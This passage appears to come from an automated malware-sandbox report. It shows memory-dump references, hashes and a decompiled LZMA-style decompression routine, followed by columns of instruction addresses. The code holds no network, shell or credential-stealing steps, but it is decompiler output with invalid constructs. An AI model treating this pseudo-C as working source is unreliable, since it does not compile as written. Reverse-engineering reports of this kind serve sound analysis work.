                  • Associated: 00000000.00000002.199790242.0000000000408000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199797277.000000000040A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199803756.0000000000413000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199834496.0000000000422000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199859273.000000000042A000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.199876622.000000000042D000.00000002.00020000.sdmp Download File
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 79859cd80aa4a68261cc067353b3b3a3bb11021b997dedf9f01a815f4beecf4f
                  • Instruction ID: e43b34c51a548f07c4fb140720fe79cc87a03685924cd857d2d075badb14d917
                  • Opcode Fuzzy Hash: 79859cd80aa4a68261cc067353b3b3a3bb11021b997dedf9f01a815f4beecf4f
                  • Instruction Fuzzy Hash: 2F815371D04229CBDF24CFA8C8847ADBBB1FB44305F25816AD456BB281C738AA96DF05
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040660F, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E0040660F(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407061))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                  0x0040661f
                  0x00406626
                  0x0040662c
                  0x00406632
                  0x00000000
                  0x00406636
                  0x00406642
                  0x00406642
                  0x00406642
                  0x0040664b
                  0x00000000
                  0x00000000
                  0x00406651
                  0x00000000
                  0x00406658
                  0x0040665c
                  0x00000000
                  0x00000000
                  0x00406665
                  0x00406668
                  0x0040666b
                  0x0040666d
                  0x0040666f
                  0x00000000
                  0x00000000
                  0x00406675
                  0x00406678
                  0x0040667a
                  0x0040667b
                  0x0040667e
                  0x00406680
                  0x00406681
                  0x00406683
                  0x00406686
                  0x0040668b
                  0x00406690
                  0x00406699
                  0x004066ac
                  0x004066af
                  0x004066b8
                  0x004066bb
                  0x004066e3
                  0x004066e3
                  0x004066e5
                  0x004066f3
                  0x004066f3
                  0x004066f7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066e7
                  0x004066e7
                  0x004066ea
                  0x004066ea
                  0x004066eb
                  0x004066eb
                  0x00000000
                  0x004066e7
                  0x004066bd
                  0x004066c1
                  0x004066c6
                  0x004066c6
                  0x004066cf
                  0x004066d5
                  0x004066d7
                  0x004066da
                  0x00000000
                  0x004066e0
                  0x004066e0
                  0x00000000
                  0x004066e0
                  0x00000000
                  0x004066fd
                  0x004066fd
                  0x00406701
                  0x00406fad
                  0x00000000
                  0x00406fad
                  0x0040670a
                  0x0040671a
                  0x0040671d
                  0x00406720
                  0x00406720
                  0x00406720
                  0x00406723
                  0x00406723
                  0x00406727
                  0x00000000
                  0x00000000
                  0x00406729
                  0x0040672c
                  0x0040672f
                  0x00406759
                  0x0040675f
                  0x00406766
                  0x00000000
                  0x00406766
                  0x00406731
                  0x00406735
                  0x00406738
                  0x0040673d
                  0x0040673d
                  0x00406748
                  0x0040674e
                  0x00406750
                  0x00406753
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406798
                  0x0040679e
                  0x004067a1
                  0x004067ae
                  0x004067b6
                  0x00000000
                  0x00000000
                  0x0040676d
                  0x0040676d
                  0x00406771
                  0x00406fbc
                  0x00000000
                  0x00406fbc
                  0x0040677d
                  0x00406788
                  0x00406788
                  0x00406788
                  0x0040678b
                  0x0040678e
                  0x00406791
                  0x00406794
                  0x00406796
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e2d
                  0x00406e2d
                  0x00406e33
                  0x00406e39
                  0x00406e3c
                  0x00406e3f
                  0x00406e59
                  0x00406e5c
                  0x00406e62
                  0x00406e6d
                  0x00406e6d
                  0x00406e6f
                  0x00406e41
                  0x00406e41
                  0x00406e50
                  0x00406e54
                  0x00406e54
                  0x00406e72
                  0x00406e79
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406e7b
                  0x00406e7b
                  0x00406e7f
                  0x0040702e
                  0x00000000
                  0x0040702e
                  0x00406e8b
                  0x00406e92
                  0x00406e9a
                  0x00406e9a
                  0x00406e9a
                  0x00406e9d
                  0x00406ea0
                  0x00406ea0
                  0x00000000
                  0x00000000
                  0x004067be
                  0x004067c0
                  0x004067c3
                  0x00406834
                  0x00406837
                  0x0040683a
                  0x00406841
                  0x0040684b
                  0x00000000
                  0x0040684b
                  0x004067c5
                  0x004067c9
                  0x004067cc
                  0x004067ce
                  0x004067d1
                  0x004067d4
                  0x004067d6
                  0x004067d9
                  0x004067db
                  0x004067e0
                  0x004067e3
                  0x004067e6
                  0x004067ea
                  0x004067f1
                  0x004067f4
                  0x004067fb
                  0x004067ff
                  0x00406807
                  0x00406807
                  0x00406807
                  0x00406801
                  0x00406801
                  0x00406801
                  0x004067f6
                  0x004067f6
                  0x004067f6
                  0x0040680b
                  0x0040680e
                  0x0040682c
                  0x0040682e
                  0x00000000
                  0x0040682e
                  0x00406810
                  0x00406813
                  0x00406816
                  0x00406819
                  0x0040681b
                  0x0040681b
                  0x0040681b
                  0x0040681e
                  0x00406821
                  0x00406823
                  0x00406824
                  0x00406827
                  0x00000000
                  0x00000000
                  0x00406a5d
                  0x00406a61
                  0x00406a7f
                  0x00406a82
                  0x00406a89
                  0x00406a8c
                  0x00406a8f
                  0x00406a92
                  0x00406a95
                  0x00406a98
                  0x00406a9a
                  0x00406aa1
                  0x00406aa2
                  0x00406aa4
                  0x00406aa7
                  0x00406aaa
                  0x00406aad
                  0x00406aad
                  0x00406ab2
                  0x00000000
                  0x00406ab2
                  0x00406a63
                  0x00406a66
                  0x00406a69
